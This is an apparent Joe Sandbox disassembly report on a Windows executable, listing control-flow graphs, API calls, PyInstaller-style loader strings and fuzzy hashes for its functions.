                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                • Opcode ID: 58225087cf25093a45ac815a211ae9755d004a3b08d95a3dd9be452e4c7b7362
                                                                                                                                                                                                                                                • Instruction ID: d70cfc6195fc226bdad842685ad331c19464c239623485a34b7d0e1af4d7eff2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58225087cf25093a45ac815a211ae9755d004a3b08d95a3dd9be452e4c7b7362
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E68184B1A0868687E721EF25F0812B9A3A0EFC4FA4F814435DD4E47785DE3CE6479B60

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 407 7ff7c71b1600-7ff7c71b1611 408 7ff7c71b1613-7ff7c71b161c call 7ff7c71b1050 407->408 409 7ff7c71b1637-7ff7c71b1651 call 7ff7c71b45b0 407->409 414 7ff7c71b162e-7ff7c71b1636 408->414 415 7ff7c71b161e-7ff7c71b1629 call 7ff7c71b2710 408->415 416 7ff7c71b1682-7ff7c71b169c call 7ff7c71b45b0 409->416 417 7ff7c71b1653-7ff7c71b1681 call 7ff7c71c4f78 call 7ff7c71b2910 409->417 415->414 424 7ff7c71b16b8-7ff7c71b16cf call 7ff7c71c0744 416->424 425 7ff7c71b169e-7ff7c71b16b3 call 7ff7c71b2710 416->425 432 7ff7c71b16d1-7ff7c71b16f4 call 7ff7c71c4f78 call 7ff7c71b2910 424->432 433 7ff7c71b16f9-7ff7c71b16fd 424->433 431 7ff7c71b1821-7ff7c71b1824 call 7ff7c71c00bc 425->431 438 7ff7c71b1829-7ff7c71b183b 431->438 448 7ff7c71b1819-7ff7c71b181c call 7ff7c71c00bc 432->448 436 7ff7c71b16ff-7ff7c71b170b call 7ff7c71b1210 433->436 437 7ff7c71b1717-7ff7c71b1737 call 7ff7c71c4fb4 433->437 444 7ff7c71b1710-7ff7c71b1712 436->444 445 7ff7c71b1761-7ff7c71b176c 437->445 446 7ff7c71b1739-7ff7c71b175c call 7ff7c71c4f78 call 7ff7c71b2910 437->446 444->448 450 7ff7c71b1802-7ff7c71b180a call 7ff7c71c4fa0 445->450 451 7ff7c71b1772-7ff7c71b1777 445->451 461 7ff7c71b180f-7ff7c71b1814 446->461 448->431 450->461 454 7ff7c71b1780-7ff7c71b17a2 call 7ff7c71c040c 451->454 462 7ff7c71b17a4-7ff7c71b17bc call 7ff7c71c0b4c 454->462 463 7ff7c71b17da-7ff7c71b17e6 call 7ff7c71c4f78 454->463 461->448 469 7ff7c71b17c5-7ff7c71b17d8 call 7ff7c71c4f78 462->469 470 7ff7c71b17be-7ff7c71b17c1 462->470 468 7ff7c71b17ed-7ff7c71b17f8 call 7ff7c71b2910 463->468 474 7ff7c71b17fd 468->474 469->468 470->454 473 7ff7c71b17c3 470->473 473->474 474->450
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                • Opcode ID: 286e7e8ec595517422b4fb4c3c5380d832a73e8b29d434e71ef21d1d453d8d85
                                                                                                                                                                                                                                                • Instruction ID: e7174c52c80f606bb8701608f639d02b6bed5967f7e507e743bba792b976bae3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 286e7e8ec595517422b4fb4c3c5380d832a73e8b29d434e71ef21d1d453d8d85
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E051BCA1B0864393EA20BF62B4411A9A3A1BFC4FB4FC04135EE1D47796DE3CE6579760

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(?,?,00000000,00007FF7C71B3CBB), ref: 00007FF7C71B88F4
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7C71B3CBB), ref: 00007FF7C71B88FA
                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00007FF7C71B3CBB), ref: 00007FF7C71B893C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8A20: GetEnvironmentVariableW.KERNEL32(00007FF7C71B388E), ref: 00007FF7C71B8A57
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7C71B8A79
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71C82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C82C1
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B2810: MessageBoxW.USER32 ref: 00007FF7C71B28EA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                • Opcode ID: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
                                                                                                                                                                                                                                                • Instruction ID: ec5bfb5899b85b3e7ad5484b1e45a380087749ebb51df6dd078f1317718654c1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE41B261A1964243FA11BF66B8962F992A0AFC9FA0FC04031DD0D4779ADE3CE5078760

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 599 7ff7c71b1210-7ff7c71b126d call 7ff7c71bbdf0 602 7ff7c71b126f-7ff7c71b1296 call 7ff7c71b2710 599->602 603 7ff7c71b1297-7ff7c71b12af call 7ff7c71c4fb4 599->603 608 7ff7c71b12b1-7ff7c71b12cf call 7ff7c71c4f78 call 7ff7c71b2910 603->608 609 7ff7c71b12d4-7ff7c71b12e4 call 7ff7c71c4fb4 603->609 620 7ff7c71b1439-7ff7c71b146d call 7ff7c71bbad0 call 7ff7c71c4fa0 * 2 608->620 615 7ff7c71b12e6-7ff7c71b1304 call 7ff7c71c4f78 call 7ff7c71b2910 609->615 616 7ff7c71b1309-7ff7c71b131b 609->616 615->620 619 7ff7c71b1320-7ff7c71b1345 call 7ff7c71c040c 616->619 628 7ff7c71b1431 619->628 629 7ff7c71b134b-7ff7c71b1355 call 7ff7c71c0180 619->629 628->620 629->628 635 7ff7c71b135b-7ff7c71b1367 629->635 637 7ff7c71b1370-7ff7c71b1398 call 7ff7c71ba230 635->637 640 7ff7c71b1416-7ff7c71b142c call 7ff7c71b2710 637->640 641 7ff7c71b139a-7ff7c71b139d 637->641 640->628 642 7ff7c71b1411 641->642 643 7ff7c71b139f-7ff7c71b13a9 641->643 642->640 645 7ff7c71b13d4-7ff7c71b13d7 643->645 646 7ff7c71b13ab-7ff7c71b13b9 call 7ff7c71c0b4c 643->646 648 7ff7c71b13d9-7ff7c71b13e7 call 7ff7c71d9ea0 645->648 649 7ff7c71b13ea-7ff7c71b13ef 645->649 652 7ff7c71b13be-7ff7c71b13c1 646->652 648->649 649->637 651 7ff7c71b13f5-7ff7c71b13f8 649->651 654 7ff7c71b13fa-7ff7c71b13fd 651->654 655 7ff7c71b140c-7ff7c71b140f 651->655 656 7ff7c71b13cf-7ff7c71b13d2 652->656 657 7ff7c71b13c3-7ff7c71b13cd call 7ff7c71c0180 652->657 654->640 658 7ff7c71b13ff-7ff7c71b1407 654->658 655->628 656->640 657->649 657->656 658->619
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                • Opcode ID: 3c9a59ff3bb3cad3576c5a79fada2bf92f4883a0976c2eb1c2674206ff102632
                                                                                                                                                                                                                                                • Instruction ID: f0ddfb54fb9ec7ee14178d4a41ba3103b588aca2adbbb5e5cdd1bef71c2110f3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c9a59ff3bb3cad3576c5a79fada2bf92f4883a0976c2eb1c2674206ff102632
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9951BB62A0864287EA60BF56B4403BAA691ABC5FB4FC44135ED4E47BD5EF3CE5078720

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF7C71CF11A,?,?,-00000018,00007FF7C71CADC3,?,?,?,00007FF7C71CACBA,?,?,?,00007FF7C71C5FAE), ref: 00007FF7C71CEEFC
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF7C71CF11A,?,?,-00000018,00007FF7C71CADC3,?,?,?,00007FF7C71CACBA,?,?,?,00007FF7C71C5FAE), ref: 00007FF7C71CEF08
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                                • Instruction ID: 4f0361497c197a877d9f78481c4e2f4a0ae586d01af83d02d19e700cfb4477c8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B41E321B1960243FA16EF56B804575A399BF88FF0FD84539DD1D57784EE3CE50A8320

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF7C71B3804), ref: 00007FF7C71B36E1
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B3804), ref: 00007FF7C71B36EB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2C9E
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2D63
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B2C50: MessageBoxW.USER32 ref: 00007FF7C71B2D99
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                • Instruction ID: d7c625f00dc0556c782e8169b8c780d09ad15c6b6bcd1706939ef0799a3c3d24
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 292186A1B1854293FA21BF24F8453BAA250BFD9B74FC04131D95D825D5EE2CE507C720

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 744 7ff7c71cbacc-7ff7c71cbaf2 745 7ff7c71cbaf4-7ff7c71cbb08 call 7ff7c71c4f58 call 7ff7c71c4f78 744->745 746 7ff7c71cbb0d-7ff7c71cbb11 744->746 760 7ff7c71cbefe 745->760 748 7ff7c71cbee7-7ff7c71cbef3 call 7ff7c71c4f58 call 7ff7c71c4f78 746->748 749 7ff7c71cbb17-7ff7c71cbb1e 746->749 767 7ff7c71cbef9 call 7ff7c71ca950 748->767 749->748 751 7ff7c71cbb24-7ff7c71cbb52 749->751 751->748 754 7ff7c71cbb58-7ff7c71cbb5f 751->754 757 7ff7c71cbb61-7ff7c71cbb73 call 7ff7c71c4f58 call 7ff7c71c4f78 754->757 758 7ff7c71cbb78-7ff7c71cbb7b 754->758 757->767 763 7ff7c71cbee3-7ff7c71cbee5 758->763 764 7ff7c71cbb81-7ff7c71cbb87 758->764 765 7ff7c71cbf01-7ff7c71cbf18 760->765 763->765 764->763 768 7ff7c71cbb8d-7ff7c71cbb90 764->768 767->760 768->757 769 7ff7c71cbb92-7ff7c71cbbb7 768->769 772 7ff7c71cbbb9-7ff7c71cbbbb 769->772 773 7ff7c71cbbea-7ff7c71cbbf1 769->773 775 7ff7c71cbbe2-7ff7c71cbbe8 772->775 776 7ff7c71cbbbd-7ff7c71cbbc4 772->776 777 7ff7c71cbbf3-7ff7c71cbc1b call 7ff7c71cd66c call 7ff7c71ca9b8 * 2 773->777 778 7ff7c71cbbc6-7ff7c71cbbdd call 7ff7c71c4f58 call 7ff7c71c4f78 call 7ff7c71ca950 773->778 780 7ff7c71cbc68-7ff7c71cbc7f 775->780 776->775 776->778 805 7ff7c71cbc1d-7ff7c71cbc33 call 7ff7c71c4f78 call 7ff7c71c4f58 777->805 806 7ff7c71cbc38-7ff7c71cbc63 call 7ff7c71cc2f4 777->806 809 7ff7c71cbd70 778->809 783 7ff7c71cbc81-7ff7c71cbc89 780->783 784 7ff7c71cbcfa-7ff7c71cbd04 call 7ff7c71d398c 780->784 783->784 788 7ff7c71cbc8b-7ff7c71cbc8d 783->788 796 7ff7c71cbd8e 784->796 797 7ff7c71cbd0a-7ff7c71cbd1f 784->797 788->784 793 7ff7c71cbc8f-7ff7c71cbca5 788->793 793->784 798 7ff7c71cbca7-7ff7c71cbcb3 793->798 801 7ff7c71cbd93-7ff7c71cbdb3 ReadFile 796->801 797->796 803 7ff7c71cbd21-7ff7c71cbd33 GetConsoleMode 797->803 798->784 799 7ff7c71cbcb5-7ff7c71cbcb7 798->799 799->784 804 7ff7c71cbcb9-7ff7c71cbcd1 799->804 807 7ff7c71cbead-7ff7c71cbeb6 GetLastError 801->807 808 7ff7c71cbdb9-7ff7c71cbdc1 801->808 803->796 810 7ff7c71cbd35-7ff7c71cbd3d 803->810 804->784 812 7ff7c71cbcd3-7ff7c71cbcdf 804->812 805->809 806->780 817 7ff7c71cbed3-7ff7c71cbed6 807->817 818 7ff7c71cbeb8-7ff7c71cbece call 7ff7c71c4f78 call 7ff7c71c4f58 807->818 808->807 814 7ff7c71cbdc7 808->814 811 7ff7c71cbd73-7ff7c71cbd7d call 7ff7c71ca9b8 809->811 810->801 816 7ff7c71cbd3f-7ff7c71cbd61 ReadConsoleW 810->816 811->765 812->784 820 7ff7c71cbce1-7ff7c71cbce3 812->820 824 7ff7c71cbdce-7ff7c71cbde3 814->824 826 7ff7c71cbd63 GetLastError 816->826 827 7ff7c71cbd82-7ff7c71cbd8c 816->827 821 7ff7c71cbedc-7ff7c71cbede 817->821 822 7ff7c71cbd69-7ff7c71cbd6b call 7ff7c71c4eec 817->822 818->809 820->784 831 7ff7c71cbce5-7ff7c71cbcf5 820->831 821->811 822->809 824->811 833 7ff7c71cbde5-7ff7c71cbdf0 824->833 826->822 827->824 831->784 837 7ff7c71cbdf2-7ff7c71cbe0b call 7ff7c71cb6e4 833->837 838 7ff7c71cbe17-7ff7c71cbe1f 833->838 844 7ff7c71cbe10-7ff7c71cbe12 837->844 841 7ff7c71cbe21-7ff7c71cbe33 838->841 842 7ff7c71cbe9b-7ff7c71cbea8 call 7ff7c71cb524 838->842 845 7ff7c71cbe35 841->845 846 7ff7c71cbe8e-7ff7c71cbe96 841->846 842->844 844->811 847 7ff7c71cbe3a-7ff7c71cbe41 845->847 846->811 849 7ff7c71cbe43-7ff7c71cbe47 847->849 850 7ff7c71cbe7d-7ff7c71cbe88 847->850 851 7ff7c71cbe63 849->851 852 7ff7c71cbe49-7ff7c71cbe50 849->852 850->846 854 7ff7c71cbe69-7ff7c71cbe79 851->854 852->851 853 7ff7c71cbe52-7ff7c71cbe56 852->853 853->851 855 7ff7c71cbe58-7ff7c71cbe61 853->855 854->847 856 7ff7c71cbe7b 854->856 855->854 856->846
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                                • Instruction ID: 41f3a82bdc70f6a546d4a16df185e655519058753c3f07397cff2973656d6180
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27C1C522A0C68643E771AF95A4402BDBB64EBC1FA0FD54131EA4E43795CE7CEA578720

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                                                                                • Opcode ID: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
                                                                                                                                                                                                                                                • Instruction ID: 2a7b28c8b8fe390e5f37d72770fe89c93e9a5191be55e77e847426bb886f5d33
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D215E61A0C64243EB10AF56F49563AE7B1FFC5FB0F900235EAAD43AE4DE6CD4468B50

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8760: GetCurrentProcess.KERNEL32 ref: 00007FF7C71B8780
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8760: OpenProcessToken.ADVAPI32 ref: 00007FF7C71B8793
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8760: GetTokenInformation.KERNELBASE ref: 00007FF7C71B87B8
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8760: GetLastError.KERNEL32 ref: 00007FF7C71B87C2
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8760: GetTokenInformation.KERNELBASE ref: 00007FF7C71B8802
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7C71B881E
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8760: CloseHandle.KERNEL32 ref: 00007FF7C71B8836
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF7C71B3C55), ref: 00007FF7C71B916C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF7C71B3C55), ref: 00007FF7C71B9175
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
